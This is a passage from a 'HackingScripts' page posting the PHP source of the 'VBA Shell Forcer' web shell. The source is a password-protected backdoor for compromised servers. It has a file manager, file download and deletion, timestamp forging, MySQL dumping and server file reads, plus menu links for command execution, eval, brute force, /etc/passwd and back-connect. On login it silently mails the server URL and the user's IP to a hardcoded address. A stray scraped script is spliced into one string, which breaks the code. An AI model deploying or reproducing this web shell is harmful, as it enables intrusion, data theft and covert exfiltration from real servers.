HackingScripts

Hack Scripts for everybody

VBA Shell Forcer

27 Apr 2015

VBA SHELL FORCER - VERSION 2.1 Source code

Edited & developed by VBATEAM

   1 <?php
   2 /****************************************\
   3 |*    VBA SHELL FORCER - VERSION 2.1  *|
   4 |*     Edit & Develop by VBATEAM        *|
   5 |*      http://vbateam.net            *|
   6 |*    ==  Hacking & Security  ==        *|
   7 \****************************************/
   8 error_reporting(7);
   9 @set_magic_quotes_runtime(0);
  10 ob_start();
  11 $mtime = explode(' ', microtime());
  12 $starttime = $mtime[1] + $mtime[0];
  13 define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)) . '/');
  14 //define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
  15 define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
  16 define('IS_COM', class_exists('COM') ? 1 : 0);
  17 define('IS_GPC', get_magic_quotes_gpc());
  18 $dis_func = get_cfg_var('disable_functions');
  19 define('IS_PHPINFO', (!eregi("phpinfo", $dis_func)) ? 1 : 0);
  20 @set_time_limit(0);
  21 foreach (array('_GET', '_POST') as $_request) {
  22     foreach ($$_request as $_key => $_value) {
  23         if ($_key{0} != '_') {
  24             if (IS_GPC) {
  25                 $_value = s_array($_value);
  26             }
  27             $$_key = $_value;
  28         }
  29     }
  30 }
  31 /*=================  Info Login  ================*/
  32 $admin = array();
  33 $admin['check'] = true;
  34 $admin['pass'] = 'byg'; // Password login
  35 $admin['cookiepre'] = '';
  36 $admin['cookiedomain'] = '';
  37 $admin['cookiepath'] = '/';
  38 $admin['cookielife'] = 86400;
  39 /*===================== End =====================*/
  40 if ($charset == 'utf8') {
  41     header("content-Type: text/html; charset=utf-8");
  42 } elseif ($charset == 'big5') {
  43     header("content-Type: text/html; charset=big5");
  44 } elseif ($charset == 'gbk') {
  45     header("content-Type: text/html; charset=gbk");
  46 } elseif ($charset == 'latin1') {
  47     header("content-Type: text/html; charset=iso-8859-2");
  48 }
  49 $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
  50 $timestamp = time();
  51 /*===================== Login =====================*/
  52 if ($action == "logout") {
  53     scookie('vbapass', '', -86400 * 365);
  54     p('<meta http-equiv="refresh" content="0;URL=' . $self . '">');
  55     p('<body background=black>');
  56     exit;
  57 }
  58 if ($admin['check']) {
  59     if ($doing == 'login') {
  60         if ($admin['pass'] == $password) {
  61             scookie('vbapass', $password);
  62             // Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam
  63             $time_shell = "" . date("d/m/Y - H:i:s") . "";
  64             $ip_remote = $_SERVER["REMOTE_ADDR"];
  65             $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . '';
  66             $to_email = 'minhduong.pjn@gmail.com
  67 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */';
  68             $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . "  - " . $_SERVER['HTTP_HOST'] . "";
  69             $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " - IP Excuting: $ip_remote - Time: $time_shell";
  70             $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
  71             @mail($to_email, $server_mail, $linkcr, $header);
  72             p('<meta http-equiv="refresh" content="2;URL=' . $self . '">');
  73             p('<body bgcolor=black>
  74 <BR><BR><div align=center><font color=yellow face=tahoma size=2>BYG - The Legend of Vietnamese Hacker World  - Please wait...<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
  75             exit;
  76         } else {
  77             $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
  78             echo $err_mess;
  79         }
  80     }
  81     if ($_COOKIE['vbapass']) {
  82         if ($_COOKIE['vbapass'] != $admin['pass']) {
  83             loginpage();
  84         }
  85     } else {
  86         loginpage();
  87     }
  88 }
  89 /*===================== Login =====================*/
  90 $errmsg = '';
  91 if ($action == 'phpinfo') {
  92     if (IS_PHPINFO) {
  93         phpinfo();
  94     } else {
  95         $errmsg = 'phpinfo() function has non-permissible';
  96     }
  97 }
  98 if ($doing == 'downfile' && $thefile) {
  99     if (!@file_exists($thefile)) {
 100         $errmsg = 'The file you want Downloadable was nonexistent';
 101     } else {
 102         $fileinfo = pathinfo($thefile);
 103         header('Content-type: application/x-' . $fileinfo['extension']);
 104         header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
 105         header('Content-Length: ' . filesize($thefile));
 106         @readfile($thefile);
 107         exit;
 108     }
 109 }
 110 if ($doing == 'backupmysql' && !$saveasfile) {
 111     dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 112     $table = array_flip($table);
 113     $result = q("SHOW tables");
 114     if (!$result) p('<h2>' . mysql_error() . '</h2>');
 115     $filename = basename($_SERVER['HTTP_HOST'] . '_MySQL.sql');
 116     header('Content-type: application/unknown');
 117     header('Content-Disposition: attachment; filename=' . $filename);
 118     $mysqldata = '';
 119     while ($currow = mysql_fetch_array($result)) {
 120         if (isset($table[$currow[0]])) {
 121             $mysqldata.= sqldumptable($currow[0]);
 122         }
 123     }
 124     mysql_close();
 125     exit;
 126 }
 127 // Mysql
 128 if ($doing == 'mysqldown') {
 129     if (!$dbname) {
 130         $errmsg = 'Please input dbname';
 131     } else {
 132         dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 133         if (!file_exists($mysqldlfile)) {
 134             $errmsg = 'The file you want Downloadable was nonexistent';
 135         } else {
 136             $result = q("select load_file('$mysqldlfile');");
 137             if (!$result) {
 138                 q("DROP TABLE IF EXISTS tmp_angel;");
 139                 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
 140                 //Download SQL
 141                 q("LOAD DATA LOCAL INFILE '" . addslashes($mysqldlfile) . "' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
 142                 $result = q("select content from tmp_angel");
 143                 q("DROP TABLE tmp_angel");
 144             }
 145             $row = @mysql_fetch_array($result);
 146             if (!$row) {
 147                 $errmsg = 'Load file failed ' . mysql_error();
 148             } else {
 149                 $fileinfo = pathinfo($mysqldlfile);
 150                 header('Content-type: application/x-' . $fileinfo['extension']);
 151                 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
 152                 header("Accept-Length: " . strlen($row[0]));
 153                 echo $row[0];
 154                 exit;
 155             }
 156         }
 157     }
 158 }
 159 ?>
 160 <html>
 161 <head>
 162 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 163 <title><?php echo str_replace('.', '', 'BYG - The Legend of Vietnamese Hacker World'); ?></title>
 164 <style type="text/css">
 165 body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
 166 
 167 a {color: #74A202;text-decoration:none;}
 168 a:hover{color: #f00;text-decoration:underline;}
 169 .alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
 170 .alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
 171 .focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
 172 .fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
 173 .fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
 174 .head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
 175 .head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
 176 .head td span{font-weight:normal;}
 177 form{margin:0;padding:0;}
 178 h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
 179 ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
 180 u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
 181 input, textarea, button
 182 {
 183    font-size: 9pt;
 184    color: #ccc;
 185    font-family: verdana, sans-serif;
 186    background-color: #202020;
 187    border-left: 1px solid #74A202;
 188    border-top: 1px solid #74A202;
 189    border-right: 1px solid #74A202;
 190    border-bottom: 1px solid #74A202;
 191 }
 192 select
 193 {
 194    font-size: 8pt;
 195    font-weight: normal;
 196    color: #ccc;
 197    font-family: verdana, sans-serif;
 198    background-color: #202020;
 199 }
 200 
 201 </style>
 202 <script type="text/javascript">
 203 function CheckAll(form) {
 204    for(var i=0;i<form.elements.length;i++) {
 205        var e = form.elements[i];
 206        if (e.name != 'chkall')
 207        e.checked = form.chkall.checked;
 208     }
 209 }
 210 function $(id) {
 211    return document.getElementById(id);
 212 }
 213 function goaction(act){
 214    $('goaction').action.value=act;
 215    $('goaction').submit();
 216 }
 217 </script>
 218 </head>
 219 <body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
 220 
 221 
 222 <div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
 223                <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
 224                    <tr>
 225                        <td align="center" valign=center>
 226                 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600"  align="center">
 227                   Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
 228                  </div>
 229                </td>
 230                    </tr>
 231                </table>
 232             </div>
 233  <script>
 234  var ld=(document.all);
 235   var ns4=document.layers;
 236  var ns6=document.getElementById&&!document.all;
 237  var ie4=document.all;
 238   if (ns4)
 239    ld=document.loading;
 240  else if (ns6)
 241    ld=document.getElementById("loading").style;
 242  else if (ie4)
 243    ld=document.all.loading.style;
 244   function init()
 245  {
 246  if(ns4){ld.visibility="hidden";}
 247  else if (ns6||ie4) ld.display="none";
 248  }
 249  </script>
 250 
 251 
 252 
 253 
 254 <table width="100%" border="0" cellpadding="0" cellspacing="0">
 255    <tr class="head_small">
 256        <td  width=100%>
 257        <table width=100%><tr class="head_small"><td  width=86px><a title="BYG - The Legend of Vietnamese Hacker World" href="<?php $self; ?>"><img src=http://cB8.upanh.com/19.0.24475887.LHg0/banner.gif height=86 border=0></a></td><td>
 258        <span style="float:left;"> <?php echo "Hostname: " . $_SERVER['HTTP_HOST'] . ""; ?>  | <a href="http://beyeugroup.com" target="_blank"><?php echo str_replace('.', '', 'BYG - The Legend of Vietnamese Hacker World'); ?> </a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span> <br />
 259 
 260        <?php
 261 $curl_on = @function_exists('curl_version');
 262 $mysql_on = @function_exists('mysql_connect');
 263 $mssql_on = @function_exists('mssql_connect');
 264 $pg_on = @function_exists('pg_connect');
 265 $ora_on = @function_exists('ocilogon');
 266 echo (($safe_mode) ? ("Safe_mod: <b><font color=green>ON</font></b> - ") : ("Safe_mod: <b><font color=red>OFF</font></b> - "));
 267 echo "PHP version: <b>" . @phpversion() . "</b> - ";
 268 echo "cURL: " . (($curl_on) ? ("<b><font color=green>ON</font></b> - ") : ("<b><font color=red>OFF</font></b> - "));
 269 echo "MySQL: <b>";
 270 $mysql_on = @function_exists('mysql_connect');
 271 if ($mysql_on) {
 272     echo "<font color=green>ON</font></b> - ";
 273 } else {
 274     echo "<font color=red>OFF</font></b> - ";
 275 }
 276 echo "MSSQL: <b>";
 277 $mssql_on = @function_exists('mssql_connect');
 278 if ($mssql_on) {
 279     echo "<font color=green>ON</font></b> - ";
 280 } else {
 281     echo "<font color=red>OFF</font></b> - ";
 282 }
 283 echo "PostgreSQL: <b>";
 284 $pg_on = @function_exists('pg_connect');
 285 if ($pg_on) {
 286     echo "<font color=green>ON</font></b> - ";
 287 } else {
 288     echo "<font color=red>OFF</font></b> - ";
 289 }
 290 echo "Oracle: <b>";
 291 $ora_on = @function_exists('ocilogon');
 292 if ($ora_on) {
 293     echo "<font color=green>ON</font></b>";
 294 } else {
 295     echo "<font color=red>OFF</font></b><BR>";
 296 }
 297 echo "Disable functions : <b>";
 298 if ('' == ($df = @ini_get('disable_functions'))) {
 299     echo "<font color=green>NONE</font></b><BR>";
 300 } else {
 301     echo "<font color=red>$df</font></b><BR>";
 302 }
 303 echo "<font color=white>Uname -a</font>: " . @substr(@php_uname(), 0, 120) . "<br>";
 304 echo "<font color=white>Server</font>: " . @substr($SERVER_SOFTWARE, 0, 120) . " - <font color=white>id</font>: " . @getmyuid() . "(" . @get_current_user() . ") - uid=" . @getmyuid() . " (" . @get_current_user() . ") gid=" . @getmygid() . "(" . @get_current_user() . ")<br>";
 305 ?>
 306        </td></tr></table></td>
 307    </tr>
 308    <tr class="alt1">
 309        <td  width=10%><span style="float:left;">[Server IP: <?php echo "<font color=yellow>" . gethostbyname($_SERVER['SERVER_NAME']) . "</font>"; ?> - Your IP: <?php echo "<font color=yellow>" . $_SERVER['REMOTE_ADDR'] . "</font>"; ?>] </span>   <br />
 310 --------------------------------------------------------------------------------------<br />
 311 
 312            <a href="javascript:goaction('file');">File Manager</a> |
 313            <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
 314            <a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> |
 315            <a href="javascript:goaction('shell');">Execute Command</a> |
 316            <a href="javascript:goaction('phpenv');">PHP Variable</a> |
 317            <a href="javascript:goaction('eval');">Eval PHP Code</a>
 318            <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('brute');">Brute</a> <?php
 319 } ?>
 320            <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php
 321 } ?>
 322            <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php
 323 } ?>
 324        </td>
 325    </tr>
 326 </table>
 327 <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
 328 <?php
 329 formhead(array('name' => 'goaction'));
 330 makehide('action');
 331 formfoot();
 332 $errmsg && m($errmsg);
 333 // Dir function
 334 !$dir && $dir = '.';
 335 $nowpath = getPath(SA_ROOT, $dir);
 336 if (substr($dir, -1) != '/') {
 337     $dir = $dir . '/';
 338 }
 339 $uedir = ue($dir);
 340 if (!$action || $action == 'file') {
 341     // Non-writeable
 342     $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
 343     // Delete dir
 344     if ($doing == 'deldir' && $thefile) {
 345         if (!file_exists($thefile)) {
 346             m($thefile . ' directory does not exist');
 347         } else {
 348             m('Directory delete ' . (deltree($thefile) ? basename($thefile) . ' success' : 'failed'));
 349         }
 350     }
 351     // Create new dir
 352     elseif ($newdirname) {
 353         $mkdirs = $nowpath . $newdirname;
 354         if (file_exists($mkdirs)) {
 355             m('Directory has already existed');
 356         } else {
 357             m('Directory created ' . (@mkdir($mkdirs, 0777) ? 'success' : 'failed'));
 358             @chmod($mkdirs, 0777);
 359         }
 360     }
 361     // Upload file
 362     elseif ($doupfile) {
 363         m('File upload ' . (@copy($_FILES['uploadfile']['tmp_name'], $uploaddir . '/' . $_FILES['uploadfile']['name']) ? 'success' : 'failed'));
 364     }
 365     // Edit file
 366     elseif ($editfilename && $filecontent) {
 367         $fp = @fopen($editfilename, 'w');
 368         m('Save file ' . (@fwrite($fp, $filecontent) ? 'success' : 'failed'));
 369         @fclose($fp);
 370     }
 371     // Modify
 372     elseif ($pfile && $newperm) {
 373         if (!file_exists($pfile)) {
 374             m('The original file does not exist');
 375         } else {
 376             $newperm = base_convert($newperm, 8, 10);
 377             m('Modify file attributes ' . (@chmod($pfile, $newperm) ? 'success' : 'failed'));
 378         }
 379     }
 380     // Rename
 381     elseif ($oldname && $newfilename) {
 382         $nname = $nowpath . $newfilename;
 383         if (file_exists($nname) || !file_exists($oldname)) {
 384             m($nname . ' has already existed or original file does not exist');
 385         } else {
 386             m(basename($oldname) . ' renamed ' . basename($nname) . (@rename($oldname, $nname) ? ' success' : 'failed'));
 387         }
 388     }
 389     // Copu
 390     elseif ($sname && $tofile) {
 391         if (file_exists($tofile) || !file_exists($sname)) {
 392             m('The goal file has already existed or original file does not exist');
 393         } else {
 394             m(basename($tofile) . ' copied ' . (@copy($sname, $tofile) ? basename($tofile) . ' success' : 'failed'));
 395         }
 396     }
 397     // File exit
 398     elseif ($curfile && $tarfile) {
 399         if (!@file_exists($curfile) || !@file_exists($tarfile)) {
 400             m('The goal file has already existed or original file does not exist');
 401         } else {
 402             $time = @filemtime($tarfile);
 403             m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
 404         }
 405     }
 406     // Date
 407     elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
 408         if (!@file_exists($curfile)) {
 409             m(basename($curfile) . ' does not exist');
 410         } else {
 411             $time = strtotime("$year-$month-$day $hour:$minute:$second");
 412             m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
 413         }
 414     }
 415     // Download
 416     elseif ($doing == 'downrar') {
 417         if ($dl) {
 418             $dfiles = '';
 419             foreach ($dl as $filepath => $value) {
 420                 $dfiles.= $filepath . ',';
 421             }
 422             $dfiles = substr($dfiles, 0, strlen($dfiles) - 1);
 423             $dl = explode(',', $dfiles);
 424             $zip = new PHPZip($dl);
 425             $code = $zip->out;
 426             header('Content-type: application/octet-stream');
 427             header('Accept-Ranges: bytes');
 428             header('Accept-Length: ' . strlen($code));
 429             header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . '_Files.tar.gz');
 430             echo $code;
 431             exit;
 432         } else {
 433             m('Please select file(s)');
 434         }
 435     }
 436     // Delete file
 437     elseif ($doing == 'delfiles') {
 438         if ($dl) {
 439             $dfiles = '';
 440             $succ = $fail = 0;
 441             foreach ($dl as $filepath => $value) {
 442                 if (@unlink($filepath)) {
 443                     $succ++;
 444                 } else {
 445                     $fail++;
 446                 }
 447             }
 448             m('Deleted file have finished??choose ' . count($dl) . ' success ' . $succ . ' fail ' . $fail);
 449         } else {
 450             m('Please select file(s)');
 451         }
 452     }
 453     // Function Newdir
 454     formhead(array('name' => 'createdir'));
 455     makehide('newdirname');
 456     makehide('dir', $nowpath);
 457     formfoot();
 458     formhead(array('name' => 'fileperm'));
 459     makehide('newperm');
 460     makehide('pfile');
 461     makehide('dir', $nowpath);
 462     formfoot();
 463     formhead(array('name' => 'copyfile'));
 464     makehide('sname');
 465     makehide('tofile');
 466     makehide('dir', $nowpath);
 467     formfoot();
 468     formhead(array('name' => 'rename'));
 469     makehide('oldname');
 470     makehide('newfilename');
 471     makehide('dir', $nowpath);
 472     formfoot();
 473     formhead(array('name' => 'fileopform'));
 474     makehide('action');
 475     makehide('opfile');
 476     makehide('dir');
 477     formfoot();
 478     $free = @disk_free_space($nowpath);
 479     !$free && $free = 0;
 480     $all = @disk_total_space($nowpath);
 481     !$all && $all = 0;
 482     $used = $all - $free;
 483     $used_percent = @round(100 / ($all / $free), 2);
 484     p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>' . sizecount($free) . '</font> of <font color=red>' . sizecount($all) . '</font> (<font color=red>' . $used_percent . '</font>%)</font>');
 485 ?>
 486 <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
 487   <form action="" method="post" id="godir" name="godir">
 488   <tr>
 489     <td nowrap>Current Directory (<?php echo $dir_writeable; ?>, <?php echo getChmod($nowpath); ?>)</td>
 490    <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath; ?>" type="text" style="width:100%;margin:0 8px;"></td>
 491     <td nowrap><input class="bt" value="GO" type="submit"></td>
 492   </tr>
 493   </form>
 494 </table>
 495 <script type="text/javascript">
 496 function createdir(){
 497    var newdirname;
 498    newdirname = prompt('Please input the directory name:', '');
 499    if (!newdirname) return;
 500    $('createdir').newdirname.value=newdirname;
 501    $('createdir').submit();
 502 }
 503 function fileperm(pfile){
 504    var newperm;
 505    newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
 506    if (!newperm) return;
 507    $('fileperm').newperm.value=newperm;
 508    $('fileperm').pfile.value=pfile;
 509    $('fileperm').submit();
 510 }
 511 function copyfile(sname){
 512    var tofile;
 513    tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
 514    if (!tofile) return;
 515    $('copyfile').tofile.value=tofile;
 516    $('copyfile').sname.value=sname;
 517    $('copyfile').submit();
 518 }
 519 function rename(oldname){
 520    var newfilename;
 521    newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
 522    if (!newfilename) return;
 523    $('rename').newfilename.value=newfilename;
 524    $('rename').oldname.value=oldname;
 525    $('rename').submit();
 526 }
 527 function dofile(doing,thefile,m){
 528    if (m && !confirm(m)) {
 529        return;
 530    }
 531    $('filelist').doing.value=doing;
 532    if (thefile){
 533        $('filelist').thefile.value=thefile;
 534    }
 535    $('filelist').submit();
 536 }
 537 function createfile(nowpath){
 538    var filename;
 539    filename = prompt('Please input the file name:', '');
 540    if (!filename) return;
 541    opfile('editfile',nowpath + filename,nowpath);
 542 }
 543 function opfile(action,opfile,dir){
 544    $('fileopform').action.value=action;
 545    $('fileopform').opfile.value=opfile;
 546    $('fileopform').dir.value=dir;
 547    $('fileopform').submit();
 548 }
 549 function godir(dir,view_writable){
 550    if (view_writable) {
 551        $('godir').view_writable.value=1;
 552    }
 553    $('godir').dir.value=dir;
 554    $('godir').submit();
 555 }
 556 </script>
 557   <?php
 558     tbhead();
 559     p('<form action="' . $self . '" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
 560     p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="' . $dir . '" type="hidden" /><input name="dir" value="' . $dir . '" type="hidden" /></div>');
 561     p('<a href="javascript:godir(\'' . $_SERVER["DOCUMENT_ROOT"] . '\');">WebRoot</a>');
 562     if ($view_writable) {
 563         p(' | <a href="javascript:godir(\'' . $nowpath . '\');">View All</a>');
 564     } else {
 565         p(' | <a href="javascript:godir(\'' . $nowpath . '\',\'1\');">View Writable</a>');
 566     }
 567     p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\'' . $nowpath . '\');">Create File</a>');
 568     if (IS_WIN && IS_COM) {
 569         $obj = new COM('scripting.filesystemobject');
 570         if ($obj && is_object($obj)) {
 571             $DriveTypeDB = array(0 => 'Unknow', 1 => 'Removable', 2 => 'Fixed', 3 => 'Network', 4 => 'CDRom', 5 => 'RAM Disk');
 572             foreach ($obj->Drives as $drive) {
 573                 if ($drive->DriveType == 2) {
 574                     p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Size:' . sizecount($drive->TotalSize) . '&#13;Free:' . sizecount($drive->FreeSpace) . '&#13;Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
 575                 } else {
 576                     p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
 577                 }
 578             }
 579         }
 580     }
 581     p('</td></tr></form>');
 582     p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
 583     // Get path
 584     $dirdata = array();
 585     $filedata = array();
 586     if ($view_writable) {
 587         $dirdata = GetList($nowpath);
 588     } else {
 589         // Open dir
 590         $dirs = @opendir($dir);
 591         while ($file = @readdir($dirs)) {
 592             $filepath = $nowpath . $file;
 593             if (@is_dir($filepath)) {
 594                 $dirdb['filename'] = $file;
 595                 $dirdb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
 596                 $dirdb['dirchmod'] = getChmod($filepath);
 597                 $dirdb['dirperm'] = getPerms($filepath);
 598                 $dirdb['fileowner'] = getUser($filepath);
 599                 $dirdb['dirlink'] = $nowpath;
 600                 $dirdb['server_link'] = $filepath;
 601                 $dirdb['client_link'] = ue($filepath);
 602                 $dirdata[] = $dirdb;
 603             } else {
 604                 $filedb['filename'] = $file;
 605                 $filedb['size'] = sizecount(@filesize($filepath));
 606                 $filedb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
 607                 $filedb['filechmod'] = getChmod($filepath);
 608                 $filedb['fileperm'] = getPerms($filepath);
 609                 $filedb['fileowner'] = getUser($filepath);
 610                 $filedb['dirlink'] = $nowpath;
 611                 $filedb['server_link'] = $filepath;
 612                 $filedb['client_link'] = ue($filepath);
 613                 $filedata[] = $filedb;
 614             }
 615         } // while
 616         unset($dirdb);
 617         unset($filedb);
 618         @closedir($dirs);
 619     }
 620     @sort($dirdata);
 621     @sort($filedata);
 622     $dir_i = '0';
 623     foreach ($dirdata as $key => $dirdb) {
 624         if ($dirdb['filename'] != '..' && $dirdb['filename'] != '.') {
 625             $thisbg = bg();
 626             p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
 627             p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
 628             p('<td><a href="javascript:godir(\'' . $dirdb['server_link'] . '\');">' . $dirdb['filename'] . '</a></td>');
 629             p('<td nowrap>' . $dirdb['mtime'] . '</td>');
 630             p('<td nowrap>--</td>');
 631             p('<td nowrap>');
 632             p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirchmod'] . '</a> / ');
 633             p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirperm'] . '</a>' . $dirdb['fileowner'] . '</td>');
 634             p('<td nowrap><a href="javascript:dofile(\'deldir\',\'' . $dirdb['server_link'] . '\',\'Are you sure will delete ' . $dirdb['filename'] . '? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\'' . $dirdb['server_link'] . '\');">Rename</a></td>');
 635             p('</tr>');
 636             $dir_i++;
 637         } else {
 638             if ($dirdb['filename'] == '..') {
 639                 p('<tr class=fout>');
 640                 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\'' . getUpPath($nowpath) . '\');">Parent Directory</a></td>');
 641                 p('</tr>');
 642             }
 643         }
 644     }
 645     p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
 646     p('<form id="filelist" name="filelist" action="' . $self . '" method="post">');
 647     makehide('action', 'file');
 648     makehide('thefile');
 649     makehide('doing');
 650     makehide('dir', $nowpath);
 651     $file_i = '0';
 652     foreach ($filedata as $key => $filedb) {
 653         if ($filedb['filename'] != '..' && $filedb['filename'] != '.') {
 654             $fileurl = str_replace(SA_ROOT, '', $filedb['server_link']);
 655             $thisbg = bg();
 656             p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
 657             p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl[' . $filedb['server_link'] . ']"></td>');
 658             p('<td><a href="' . $fileurl . '" target="_blank">' . $filedb['filename'] . '</a></td>');
 659             p('<td nowrap>' . $filedb['mtime'] . '</td>');
 660             p('<td nowrap>' . $filedb['size'] . '</td>');
 661             p('<td nowrap>');
 662             p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['filechmod'] . '</a> / ');
 663             p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['fileperm'] . '</a>' . $filedb['fileowner'] . '</td>');
 664             p('<td nowrap>');
 665             p('<a href="javascript:dofile(\'downfile\',\'' . $filedb['server_link'] . '\');">Down</a> | ');
 666             p('<a href="javascript:copyfile(\'' . $filedb['server_link'] . '\');">Copy</a> | ');
 667             p('<a href="javascript:opfile(\'editfile\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Edit</a> | ');
 668             p('<a href="javascript:rename(\'' . $filedb['server_link'] . '\');">Rename</a> | ');
 669             p('<a href="javascript:opfile(\'newtime\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Time</a>');
 670             p('</td></tr>');
 671             $file_i++;
 672         }
 673     }
 674     p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">' . $dir_i . ' directories / ' . $file_i . ' files</td></tr>');
 675     p('</form></table>');
 676 } // end dir
 677 elseif ($action == 'sqlfile') {
 678     if ($doing == "mysqlupload") {
 679         $file = $_FILES['uploadfile'];
 680         $filename = $file['tmp_name'];
